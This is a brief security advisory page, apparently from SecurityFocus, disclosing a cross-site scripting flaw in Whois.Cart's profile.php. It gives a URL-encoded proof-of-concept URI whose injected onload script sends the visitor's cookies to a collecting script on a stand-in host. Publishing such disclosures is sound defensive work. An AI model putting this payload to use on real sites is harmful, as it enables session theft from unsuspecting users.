Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Whois.Cart Profile.PHP Cross-Site Scripting Vulnerability

No exploit is required.

The following proof of concept URI is available:
http://www.example.com/whoiscart/profile.php?page=%3Cbody+onload%3Ddocument.forms%5B0%5D.submit%28document.cookie%29%3E%3Cform+name%3Dform1+action%3Dhttp%3A%2F%2Fwww.example.com%2F%7Evic%2Ftest.php%3E%3C%2Fform%3E%3C%2Fbody%3E







 

Privacy Statement
Copyright 2009, SecurityFocus